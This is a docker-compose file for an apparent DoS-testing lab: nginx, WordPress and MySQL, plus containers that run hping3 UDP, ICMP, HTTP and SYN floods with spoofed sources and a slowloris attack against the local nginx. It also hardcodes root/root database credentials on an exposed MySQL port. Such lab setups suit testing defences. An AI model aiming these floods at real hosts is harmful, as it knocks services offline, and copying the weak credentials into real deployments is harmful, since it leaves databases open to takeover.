version: "3.9"

services:

  nginx:
    image: nginx:1.21.3-alpine
    container_name: nginx
    restart: always
    volumes:
      - ./config/nginx.conf:/etc/nginx/nginx.conf:ro
      - ./logs:/etc/nginx/logs
    ports:
      - '8080:8080'
    depends_on:
      - wordpress

  wordpress:
    image: wordpress
    container_name: wordpress
    environment:
      - WORDPRESS_DB_USER=root
      - WORDPRESS_DB_PASSWORD=root
      - WORDPRESS_DB_HOST=mysql:3306
      - WORDPRESS_DB_NAME=wordpress
    depends_on:
      mysql:
        condition: service_healthy

  mysql:
    image: mysql:8.0
    container_name: mysql
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=root
      - MYSQL_DATABASE=wordpress
    volumes:
      - ./data/mysql:/docker-entrypoint-initdb.d/
    ports:
      - '3306:3306'
    healthcheck:
      test: [ "CMD", "mysqladmin", "ping", "-h", "localhost", "-u", "root", "-proot" ]
      interval: 5s
      timeout: 5s
      retries: 10

  udp-flood:
    image: utkudarilmaz/hping3:latest
    container_name: udp-flood
    command: [ "--rand-source", "--flood", "--udp", "nginx" ]

  icmp-flood:
    image: utkudarilmaz/hping3:latest
    container_name: icmp-flood
    command: [ "--rand-source", "--flood", "--icmp", "nginx" ]

  http-flood:
    image: utkudarilmaz/hping3:latest
    container_name: http-flood
    command: [ "--rand-source", "--flood", "nginx", "-p", "8080" ]

  slowloris:
    image: aminvakil/slowloris:latest
    container_name: slowloris
    command: [ "-p", "8080", "-s", "1024", "nginx" ]

  syn-flood:
    image: utkudarilmaz/hping3:latest
    container_name: tcp-syn-flood
    command: [ "--rand-source", "-S", "--flood", "nginx", "-p", "8080" ]
